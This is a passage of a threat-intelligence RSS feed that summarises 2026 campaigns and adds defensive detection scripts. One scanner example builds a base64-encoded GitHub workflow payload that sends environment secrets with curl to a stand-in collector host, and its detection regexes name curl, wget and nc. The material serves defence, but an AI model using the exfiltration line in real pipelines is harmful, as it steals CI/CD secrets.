&lt;p&gt;Malware, High Severity, Remote Access Trojan&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Fox-IT Blog | &lt;a href=&quot;https://blog.fox-it.com/2026/05/22/remotepe-the-lazarus-rat-that-lives-in-memory/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 14:55:58 GMT</pubDate>
      <dc:creator>Fox-SRT</dc:creator>
      <source url="https://blog.fox-it.com/2026/05/22/remotepe-the-lazarus-rat-that-lives-in-memory/">Fox-IT Blog</source>
      <category>Malware</category>
      <category>Remote Access Trojan</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns</title>
      <link>https://brewedintel.io/articles/742361d2-a511-4504-a6c6-6ab5624a33c6</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/742361d2-a511-4504-a6c6-6ab5624a33c6</guid>
      <description>Unit 42 has revealed that the Iranian APT group Screening Serpens is conducting espionage campaigns targeting the technology and defense sectors. The group employs AppDomainManager hijacking to achieve code execution and persistence, coupled with novel remote access trojan (RAT) variants. These attacks pose a significant threat due to the sensitive nature of the targets and the use of sophisticated techniques to evade detection. Organizations in these sectors should enhance monitoring for anomalous .NET application behavior and implement robust endpoint detection measures to mitigate the risk.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Unit 42 has revealed that the Iranian APT group Screening Serpens is conducting espionage campaigns targeting the technology and defense sectors. The group employs AppDomainManager hijacking to achieve code execution and persistence, coupled with novel remote access trojan (RAT) variants. These attacks pose a significant threat due to the sensitive nature of the targets and the use of sophisticated techniques to evade detection. Organizations in these sectors should enhance monitoring for anomalous .NET application behavior and implement robust endpoint detection measures to mitigate the risk.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;For defenders, the targeting of defense and tech sectors indicates that Screening Serpens is after high-value intellectual property, and their use of novel techniques increases the likelihood of successful breaches.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor for AppDomainManager hijacking indicators, such as managed assemblies loaded from user-writable paths by signed .NET executables and .exe.config files that set appDomainManagerAssembly, and deploy enhanced logging and detection for RAT activity on critical systems.&lt;/p&gt;
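&lt;p&gt;Both the Nimbus Manticore item above (anomalous .config files) and this one point at the same control: find .NET executables whose configuration injects an AppDomainManager. The following scanner is an added example, not code from Unit 42 or Check Point Research. It checks the two places the CLR reads that setting from, the appDomainManagerAssembly and appDomainManagerType elements under the runtime section of an application's .exe.config, and the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables. The allowlist entry Contoso.Hosting and the sample configs are constructed for the example.&lt;/p&gt;

```python
"""Find AppDomainManager hijacking indicators in .NET app configs and
process environments. Added example; not code from Unit 42 or Check Point."""
import os
import xml.etree.ElementTree as ET

# Environment variables the CLR honours for injecting an AppDomainManager.
HIJACK_ENV_VARS = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE")

# Assumption for this example: assemblies the organisation legitimately
# ships as AppDomainManagers (hypothetical name).
ALLOWED_MANAGER_ASSEMBLIES = {"Contoso.Hosting"}


def find_appdomain_manager(config_xml: str) -> dict:
    """Return {'assembly': ..., 'type': ...} when the config's runtime
    section names an AppDomainManager, else {}.

    Unparseable XML yields {} here; a real scanner should log such files
    rather than skip them."""
    try:
        root = ET.fromstring(config_xml)
    except ET.ParseError:
        return {}
    found = {}
    for runtime in root.iter("runtime"):
        asm = runtime.find("appDomainManagerAssembly")
        typ = runtime.find("appDomainManagerType")
        if asm is not None:
            found["assembly"] = asm.get("value", "")
        if typ is not None:
            found["type"] = typ.get("value", "")
    return found


def is_suspicious(finding: dict) -> bool:
    """Anything not on the allowlist is worth a look: legitimate use of
    this setting is rare outside custom hosting frameworks."""
    if not finding:
        return False
    short_name = finding.get("assembly", "").split(",")[0].strip()
    return short_name not in ALLOWED_MANAGER_ASSEMBLIES


def scan_env(env: dict) -> list:
    """Report AppDomainManager variables present in a process environment."""
    return [(k, env[k]) for k in HIJACK_ENV_VARS if k in env]


def scan_directory(path: str) -> list:
    """Walk a tree and return (file, finding) for every *.exe.config that
    injects a manager not on the allowlist."""
    hits = []
    for dirpath, _dirs, files in os.walk(path):
        for name in files:
            if not name.lower().endswith(".exe.config"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                finding = find_appdomain_manager(fh.read())
            if is_suspicious(finding):
                hits.append((full, finding))
    return hits


def build_sample_config(assembly: str, manager_type: str) -> str:
    """Construct an app.exe.config in memory with ElementTree, so the
    example carries no markup literal and stays self-contained."""
    root = ET.Element("configuration")
    runtime = ET.SubElement(root, "runtime")
    ET.SubElement(runtime, "appDomainManagerAssembly", value=assembly)
    ET.SubElement(runtime, "appDomainManagerType", value=manager_type)
    return ET.tostring(root, encoding="unicode")


# Constructed samples; neither is a config observed in the campaigns.
SAMPLE_HIJACK = build_sample_config(
    "Updater, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null",
    "Updater.Manager")
SAMPLE_BENIGN = build_sample_config(
    "Contoso.Hosting, Version=2.0.0.0", "Contoso.Hosting.Manager")

if __name__ == "__main__":
    print(find_appdomain_manager(SAMPLE_HIJACK))
    print(scan_env({"APPDOMAIN_MANAGER_ASM": "Updater", "PATH": "/usr/bin"}))
```

&lt;p&gt;Run scan_directory over Program Files and over user-writable locations where a signed .NET executable has been dropped next to a planted config. The environment-variable route leaves no file to find, so pair the scan with image-load telemetry (Sysmon Event ID 7) for managed assemblies loaded from user-writable paths by signed .NET binaries.&lt;/p&gt;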
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, Critical Severity, Espionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Unit 42 (Palo Alto Networks) | &lt;a href=&quot;https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 13:00:42 GMT</pubDate>
      <dc:creator>Unit 42</dc:creator>
      <source url="https://unit42.paloaltonetworks.com/tracking-iran-apt-screening-serpens/">Unit 42 (Palo Alto Networks)</source>
      <category>Adversary</category>
      <category>Espionage</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows</title>
      <link>https://brewedintel.io/articles/d084f36c-1c73-45c7-a40d-da25d023959b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/d084f36c-1c73-45c7-a40d-da25d023959b</guid>
      <description>An automated campaign named Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories within six hours. Attackers used throwaway accounts and forged identities to inject GitHub Actions workflows containing base64-encoded bash payloads. These workflows exfiltrate CI/CD secrets, enabling downstream supply chain compromise. The attack leverages trusted CI/CD pipelines to distribute malicious code, impacting a wide range of dependent projects. Mitigation requires auditing GitHub Actions workflows, enforcing strict branch protection, and monitoring for unauthorized automated commits.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;An automated campaign named Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories within six hours. Attackers used throwaway accounts and forged identities to inject GitHub Actions workflows containing base64-encoded bash payloads. These workflows exfiltrate CI/CD secrets, enabling downstream supply chain compromise. The attack leverages trusted CI/CD pipelines to distribute malicious code, impacting a wide range of dependent projects. Mitigation requires auditing GitHub Actions workflows, enforcing strict branch protection, and monitoring for unauthorized automated commits.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Attackers can access CI/CD secrets and inject malicious code into trusted repositories, leading to widespread supply chain compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Set the default GITHUB_TOKEN permissions for workflows to read-only and grant write scopes per job only where needed, enable branch protection rules so that workflow files under .github/workflows cannot be added or changed by a direct push, require approval before workflows run for first-time or outside contributors, audit workflow changes for encoded run steps, and monitor for commits from newly created or automated accounts.&lt;/p&gt;
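&lt;p&gt;The mitigation above starts with knowing which workflows in your organisation already carry the Megalodon pattern. The scanner below is an added example, not code from The Hacker News or the researchers who reported the campaign; it applies a handful of textual heuristics to workflow files (runtime base64 decoding piped into a shell, long encoded literals, toJSON(secrets), secrets passed to an outbound HTTP client, write-all token permissions) and decodes any embedded blob so an analyst can read the payload. The two workflow files and the payload are constructed for the example.&lt;/p&gt;

```python
"""Audit GitHub Actions workflow files for Megalodon-style tradecraft.
Added example; the workflows and the payload below are constructed."""
import base64
import re

LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")

# (finding name, regex applied to the whole workflow text)
PATTERNS = [
    ("base64_decoded_into_shell",
     re.compile(r"base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:ba|z)?sh\b")),
    ("long_base64_literal", LONG_BASE64),
    ("all_secrets_serialised", re.compile(r"toJSON\(\s*secrets\s*\)", re.I)),
    ("secret_passed_to_http_client",
     re.compile(r"\b(?:curl|wget|nc)\b[^\n]*secrets\.", re.I)),
    ("write_all_permissions", re.compile(r"^\s*permissions:\s*write-all\s*$", re.M)),
]


def scan_workflow(text: str) -> list:
    """Names of every heuristic that fired on this workflow text."""
    return [name for name, rx in PATTERNS if rx.search(text)]


def decode_embedded_payloads(text: str) -> list:
    """Decode long base64 literals so the analyst sees what would run."""
    decoded = []
    for blob in LONG_BASE64.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid base64 after all (e.g. a long hash)
    return decoded


# Constructed payload of the kind hidden behind base64 in such commits:
# dump the job environment (which holds any secrets mapped into env:) and
# post it to an attacker-controlled host. The host name is a reserved TLD.
PAYLOAD = ('printenv | grep -i -E "token|secret|key" | curl -s -X POST '
           '--data-binary @- https://collector.example.invalid/in; echo done\n')
BLOB = base64.b64encode(PAYLOAD.encode()).decode()

MALICIOUS_WORKFLOW = f"""name: ci
on: [push]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Prepare
        env:
          ALL: ${{{{ toJSON(secrets) }}}}
        run: echo {BLOB} | base64 -d | bash
"""

BENIGN_WORKFLOW = """name: ci
on: [push]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m pytest
"""

if __name__ == "__main__":
    print(scan_workflow(MALICIOUS_WORKFLOW))
    print(decode_embedded_payloads(MALICIOUS_WORKFLOW)[0])
    print(scan_workflow(BENIGN_WORKFLOW))
```

&lt;p&gt;Run it over every file under .github/workflows in each repository, and over the diff of any commit that touches that directory. The long-literal heuristic also fires on legitimately embedded certificates and keys, so treat it as a prompt to decode and read, not as a verdict on its own.&lt;/p&gt;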
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Malicious CI/CD Workflows, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/megalodon-github-attack-targets-5561.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 11:55:24 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/megalodon-github-attack-targets-5561.html">The Hacker News</source>
      <category>Adversary</category>
      <category>Malicious CI/CD Workflows</category>
      <category>Supply Chain Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Paved With Intent: ROADtools and Nation-State Tactics in the Cloud</title>
      <link>https://brewedintel.io/articles/4d7bf69a-4a34-4c64-9b2e-e51a468d8f26</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/4d7bf69a-4a34-4c64-9b2e-e51a468d8f26</guid>
      <description>The article reports that the open-source framework ROADtools is being misused by threat actors, including nation-state groups, to conduct cloud intrusions. ROADtools, originally designed for Azure AD (now Microsoft Entra ID) reconnaissance and token manipulation, enables attackers to discover sensitive information, escalate privileges, and maintain persistence in cloud environments. The impact can be severe, leading to unauthorized access to critical data and systems. To mitigate this threat, organizations should monitor for abnormal use of ROADtools, implement strict identity and access controls, and adopt behavioral detection mechanisms to identify malicious activities leveraging this framework.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The article reports that the open-source framework ROADtools is being misused by threat actors, including nation-state groups, to conduct cloud intrusions. ROADtools, originally designed for Azure AD (now Microsoft Entra ID) reconnaissance and token manipulation, enables attackers to discover sensitive information, escalate privileges, and maintain persistence in cloud environments. The impact can be severe, leading to unauthorized access to critical data and systems. To mitigate this threat, organizations should monitor for abnormal use of ROADtools, implement strict identity and access controls, and adopt behavioral detection mechanisms to identify malicious activities leveraging this framework.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;ROADtools is being actively abused for cloud intrusions, potentially allowing attackers to gain persistent access to Azure AD environments and sensitive data.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor Entra ID sign-in and Graph activity logs for the footprint of ROADtools commands, especially reconnaissance (bulk directory reads) and token manipulation (first-party client IDs presented by scripting user agents, refresh tokens redeemed for several clients in quick succession), and enforce conditional access policies that require a compliant device for those clients to limit lateral movement.&lt;/p&gt;
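&lt;p&gt;Monitoring for ROADtools use is mostly a question of what the tenant's sign-in logs look like when a Python tool authenticates as a first-party Microsoft client. The following triage script is an added example, not Unit 42's detection content. It encodes two assumptions of its own: that roadrecon authenticates by default as the Azure Active Directory PowerShell client (app ID 1b730954-1685-4b74-9bfd-dac224a7b894) against the legacy Azure AD Graph resource (00000002-0000-0000-c000-000000000000), and that family-refresh-token abuse with roadtx shows up as one user at one IP obtaining tokens for several distinct first-party client IDs within a few minutes. The sign-in records are constructed; the client and resource IDs are Microsoft's well-known first-party values.&lt;/p&gt;

```python
"""Triage Microsoft Entra ID sign-in records for ROADtools-style activity.
Added example, not Unit 42's content; records are constructed and the
assumptions about roadrecon/roadtx defaults are this example's own."""
from datetime import datetime

AAD_POWERSHELL = "1b730954-1685-4b74-9bfd-dac224a7b894"   # Azure Active Directory PowerShell
AZURE_CLI = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"        # Microsoft Azure CLI
MS_OFFICE = "d3590ed6-52b3-4102-aeff-aad2292ab01c"        # Microsoft Office
AAD_GRAPH_RESOURCE = "00000002-0000-0000-c000-000000000000"  # legacy Azure AD Graph
MS_GRAPH_RESOURCE = "00000003-0000-0000-c000-000000000000"   # Microsoft Graph

# User-agent fragments expected when the PowerShell client really is PowerShell.
POWERSHELL_UA = ("PowerShell", "WindowsPowerShell")


def assess_signin(rec: dict) -> list:
    """Per-record reasons; an empty list means nothing stood out."""
    reasons = []
    ua = rec.get("userAgent", "")
    if rec.get("appId") == AAD_POWERSHELL and not any(f in ua for f in POWERSHELL_UA):
        reasons.append("AAD PowerShell client id presented by a non-PowerShell user agent")
    if rec.get("resourceId") == AAD_GRAPH_RESOURCE:
        reasons.append("token issued for the legacy Azure AD Graph resource")
    return reasons


def client_switching(records: list, threshold: int = 3, window_minutes: int = 10) -> list:
    """(user, ip, distinct client count) for users who obtained tokens for
    several client IDs from one address inside the window; the shape that
    refresh-token reuse across a client family produces."""
    by_key = {}
    for r in records:
        by_key.setdefault((r["userPrincipalName"], r["ipAddress"]), []).append(r)
    hits = []
    for (user, ip), recs in by_key.items():
        times = sorted(datetime.fromisoformat(r["createdDateTime"]) for r in recs)
        span_seconds = (times[-1] - times[0]).total_seconds()
        apps = {r["appId"] for r in recs}
        if len(apps) >= threshold and window_minutes * 60 >= span_seconds:
            hits.append((user, ip, len(apps)))
    return hits


def triage(records: list) -> dict:
    """Combine both views into one report keyed by user principal name."""
    report = {}
    for r in records:
        reasons = assess_signin(r)
        if reasons:
            report.setdefault(r["userPrincipalName"], []).extend(reasons)
    for user, ip, count in client_switching(records):
        report.setdefault(user, []).append(f"{count} distinct client ids from {ip} within window")
    return report


def _rec(ts, user, ip, app, resource, ua):
    return {"createdDateTime": ts, "userPrincipalName": user, "ipAddress": ip,
            "appId": app, "resourceId": resource, "userAgent": ua}


# Constructed records (documentation IP ranges, example domain).
SAMPLE_SIGNINS = [
    _rec("2026-05-20T09:00:05+00:00", "alice@contoso.example", "203.0.113.7",
         AAD_POWERSHELL, AAD_GRAPH_RESOURCE, "python-requests/2.31.0"),
    _rec("2026-05-20T09:01:10+00:00", "alice@contoso.example", "203.0.113.7",
         AZURE_CLI, MS_GRAPH_RESOURCE, "python-requests/2.31.0"),
    _rec("2026-05-20T09:02:40+00:00", "alice@contoso.example", "203.0.113.7",
         MS_OFFICE, MS_GRAPH_RESOURCE, "python-requests/2.31.0"),
    _rec("2026-05-20T09:15:00+00:00", "bob@contoso.example", "198.51.100.3",
         AAD_POWERSHELL, MS_GRAPH_RESOURCE, "WindowsPowerShell/5.1.19041.1"),
]

if __name__ == "__main__":
    for user, reasons in triage(SAMPLE_SIGNINS).items():
        print(user, reasons)
```

&lt;p&gt;Sign-in logs only show token issuance; the enumeration itself is thousands of directory reads made with that token, which for Microsoft Graph you can see in the MicrosoftGraphActivityLogs diagnostic category. Feed this script from the SigninLogs and NonInteractiveUserSignInLogs tables, since refresh-token redemptions land in the non-interactive table.&lt;/p&gt;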
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Cloud Intrusion, Tool Misuse&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Unit 42 (Palo Alto Networks) | &lt;a href=&quot;https://unit42.paloaltonetworks.com/roadtools-cloud-attacks/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 10:00:24 GMT</pubDate>
      <dc:creator>Bill Batchelor and Eyal Rafian</dc:creator>
      <source url="https://unit42.paloaltonetworks.com/roadtools-cloud-attacks/">Unit 42 (Palo Alto Networks)</source>
      <category>Adversary</category>
      <category>Cloud Intrusion</category>
      <category>Tool Misuse</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload</title>
      <link>https://brewedintel.io/articles/a585929c-1242-4493-88c7-1c3c4419b70a</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/a585929c-1242-4493-88c7-1c3c4419b70a</guid>
      <description>Cloud Atlas continues to target government and diplomatic entities in Russia and Belarus using spear-phishing emails with ZIP archives containing LNK files. The attack chain involves PowerShell scripts that deploy two backdoors: VBCloud, a file stealer targeting documents and PDFs, and PowerShower, used for network reconnaissance, lateral movement, and Kerberoasting. The group employs SSH tunnels, Tor, and RevSocks for persistent C2, along with registry persistence and anti-forensic measures. Organizations in these sectors are at high risk of data theft and network compromise.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Cloud Atlas continues to target government and diplomatic entities in Russia and Belarus using spear-phishing emails with ZIP archives containing LNK files. The attack chain involves PowerShell scripts that deploy two backdoors: VBCloud, a file stealer targeting documents and PDFs, and PowerShower, used for network reconnaissance, lateral movement, and Kerberoasting. The group employs SSH tunnels, Tor, and RevSocks for persistent C2, along with registry persistence and anti-forensic measures. Organizations in these sectors are at high risk of data theft and network compromise.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Cloud Atlas is a sophisticated APT group actively targeting government and diplomatic sectors in Russia and Belarus, using advanced techniques to steal sensitive data and move laterally within networks.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement email filtering that blocks or detonates archives containing LNK files, enforce multi-factor authentication, monitor for unusual PowerShell execution (script block logging, Event ID 4104), SSH tunnel and Tor activity, and Kerberoasting (Security Event ID 4769 with RC4-encrypted tickets), and conduct regular security awareness training to reduce phishing risk.&lt;/p&gt;
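&lt;p&gt;Of the activities listed in the summary, Kerberoasting is the one that leaves a clean signal on the domain controller: Security Event ID 4769 (a Kerberos service ticket was requested) with Ticket Encryption Type 0x17 (RC4-HMAC), because the attacker downgrades to RC4 to make offline cracking cheap. The detector below is an added example, not Kaspersky's logic; it groups successful RC4 ticket requests by requesting account and source address and flags bursts that touch many distinct service accounts. It needs the Audit Kerberos Service Ticket Operations subcategory enabled on domain controllers. The event records, account names and thresholds are constructed for the example.&lt;/p&gt;

```python
"""Kerberoasting detection over Security Event ID 4769 records. Added
example; events and names are constructed, thresholds are starting points."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
SUCCESS = "0x0"


def is_roastable_target(service_name: str) -> bool:
    """Kerberoasting targets user accounts holding SPNs. Computer accounts
    (trailing $) and the KDC account itself are excluded as noise."""
    svc = service_name.split("@")[0]
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def kerberoast_candidates(events: list, threshold: int = 5,
                          window: timedelta = timedelta(minutes=10)) -> list:
    """Return [(account, ip, max distinct services in any window)] for
    accounts whose successful RC4 TGS requests hit at least `threshold`
    distinct roastable services within `window`. IpAddress in real events
    usually carries an ::ffff: prefix; normalise it before grouping."""
    per_source = defaultdict(list)
    for ev in events:
        if ev.get("Status") != SUCCESS or ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if not is_roastable_target(ev["ServiceName"]):
            continue
        key = (ev["TargetUserName"], ev["IpAddress"])
        per_source[key].append((datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    hits = []
    for (account, ip), reqs in per_source.items():
        reqs.sort()
        start, best = 0, 0
        for end in range(len(reqs)):
            # Slide the window start forward until the span fits.
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = len({svc for _, svc in reqs[start:end + 1]})
            best = max(best, distinct)
        if best >= threshold:
            hits.append((account, ip, best))
    return hits


def _ev(ts, user, svc, enc, ip, status=SUCCESS):
    return {"TimeCreated": ts, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": enc, "IpAddress": ip, "Status": status}


# Constructed 4769 records: one workstation burst-requesting RC4 tickets for
# six service accounts in under two minutes, plus ordinary AES traffic and
# one failed request (0x7, service principal unknown) that must not count.
SAMPLE_EVENTS = [
    _ev("2026-05-20T10:00:01", "jdoe@CORP.EXAMPLE", "svc_sql", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:00:02", "jdoe@CORP.EXAMPLE", "svc_web", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:00:02", "jdoe@CORP.EXAMPLE", "svc_backup", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:00:03", "jdoe@CORP.EXAMPLE", "svc_sharepoint", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:00:04", "jdoe@CORP.EXAMPLE", "svc_exchange", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:01:30", "jdoe@CORP.EXAMPLE", "svc_reporting", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:00:05", "jdoe@CORP.EXAMPLE", "FS01$", RC4_HMAC, "10.0.5.23"),
    _ev("2026-05-20T10:00:20", "asmith@CORP.EXAMPLE", "svc_sql", "0x12", "10.0.5.40"),
    _ev("2026-05-20T10:00:21", "asmith@CORP.EXAMPLE", "krbtgt", "0x12", "10.0.5.40"),
    _ev("2026-05-20T10:02:00", "jdoe@CORP.EXAMPLE", "svc_ghost", RC4_HMAC, "10.0.5.23", "0x7"),
]

if __name__ == "__main__":
    print(kerberoast_candidates(SAMPLE_EVENTS))
```

&lt;p&gt;Tune the threshold against a week of baseline data; monitoring consoles and backup agents legitimately touch several SPNs. Current tooling can request AES tickets too, so run the same aggregation over 0x12 tickets with a higher threshold, and remove the incentive by giving service accounts long random passwords or moving them to group managed service accounts.&lt;/p&gt;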
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Backdoor, Credential Theft, Spear Phishing&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Kaspersky Securelist | &lt;a href=&quot;https://securelist.com/cloud-atlas-2026/119895/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 09:12:13 GMT</pubDate>
      <dc:creator>Kaspersky</dc:creator>
      <source url="https://securelist.com/cloud-atlas-2026/119895/">Kaspersky Securelist</source>
      <category>Adversary</category>
      <category>Backdoor</category>
      <category>Credential Theft</category>
      <category>Spear Phishing</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Kimwolf DDoS Botnet Operator Arrested in Canada Over DDoS-for-Hire Attacks</title>
      <link>https://brewedintel.io/articles/57b8b5bf-56a0-46c0-a662-a9b20690e478</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/57b8b5bf-56a0-46c0-a662-a9b20690e478</guid>
      <description>The U.S. Department of Justice announced the arrest of Canadian Jacob Butler for operating the Kimwolf DDoS botnet, a variant of AISURU. The botnet facilitated DDoS-for-hire attacks, enabling customers to launch distributed denial-of-service attacks against targets. The arrest highlights ongoing law enforcement efforts against cybercrime. Organizations should implement robust DDoS mitigation strategies to defend against such threats.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The U.S. Department of Justice announced the arrest of Canadian Jacob Butler for operating the Kimwolf DDoS botnet, a variant of AISURU. The botnet facilitated DDoS-for-hire attacks, enabling customers to launch distributed denial-of-service attacks against targets. The arrest highlights ongoing law enforcement efforts against cybercrime. Organizations should implement robust DDoS mitigation strategies to defend against such threats.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;DDoS botnets like Kimwolf can disrupt online services, causing financial and reputational damage. The case shows that DDoS-for-hire capacity of this scale is available to anyone willing to pay, and similar services could be turned against your organization if you have no mitigation in place.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Deploy DDoS protection solutions, monitor network traffic for anomalies, and ensure incident response plans include DDoS mitigation procedures. Collaborate with ISPs to block malicious traffic.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Botnet, DDoS&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/kimwolf-ddos-botnet-operator-arrested.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 08:50:18 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/kimwolf-ddos-botnet-operator-arrested.html">The Hacker News</source>
      <category>Malware</category>
      <category>Botnet</category>
      <category>DDoS</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>China&#x27;s Webworm Uses Discord, Microsoft Graphs to Hack EU Govts.</title>
      <link>https://brewedintel.io/articles/853f95be-5ca9-4d79-840b-1a7b5e9ca074</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/853f95be-5ca9-4d79-840b-1a7b5e9ca074</guid>
      <description>The Chinese APT group Webworm has been targeting EU governments using Discord and Microsoft Graph APIs as command-and-control channels, along with SOCKS proxies and the SoftEther VPN client to obscure command and control traffic. This campaign highlights the group&#x27;s adaptation of legitimate services and tunneling tools for persistent access and data exfiltration. The impact is significant given the targeting of state entities, potentially leading to intelligence theft or geopolitical leverage. Organizations should enhance monitoring for abnormal usage of collaboration platforms and VPN tools, enforce application control policies, and segment networks to limit lateral movement. Vigilance against sophisticated, multi-vector attacks employing living-off-the-land techniques is crucial.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Chinese APT group Webworm has been targeting EU governments using Discord and Microsoft Graph APIs as command-and-control channels, along with SOCKS proxies and the SoftEther VPN client to obscure command and control traffic. This campaign highlights the group&amp;#x27;s adaptation of legitimate services and tunneling tools for persistent access and data exfiltration. The impact is significant given the targeting of state entities, potentially leading to intelligence theft or geopolitical leverage. Organizations should enhance monitoring for abnormal usage of collaboration platforms and VPN tools, enforce application control policies, and segment networks to limit lateral movement. Vigilance against sophisticated, multi-vector attacks employing living-off-the-land techniques is crucial.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;State-sponsored APT groups like Webworm persistently target government networks for espionage, often using stealthy channels that bypass traditional defenses.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor network logs for unauthorized VPN or proxy tools and anomalous API calls to services like Discord and Microsoft Graph; enforce strict application allowlisting and network segmentation.&lt;/p&gt;
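&lt;p&gt;Both Discord and Microsoft Graph are ordinary destinations on most networks, so flagging the hostname alone is useless; what distinguishes command-and-control is the shape of the traffic. The script below is an added example, not from Dark Reading or the original research: it reads proxy log records, flags POSTs to Discord webhook endpoints, and finds hosts that contact a watched domain on a near-constant cadence (low coefficient of variation of the inter-request gaps), which is how a beaconing implant looks against human-driven use of the same service. The log records, thresholds and IP addresses are constructed.&lt;/p&gt;

```python
"""Beaconing and webhook-abuse detection over proxy logs for hosts that
front C2 on Discord or Microsoft Graph. Added example; records constructed."""
import csv
import io
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

WATCHED_HOSTS = {"discord.com", "discordapp.com", "gateway.discord.gg", "graph.microsoft.com"}
DISCORD_HOSTS = {"discord.com", "discordapp.com"}
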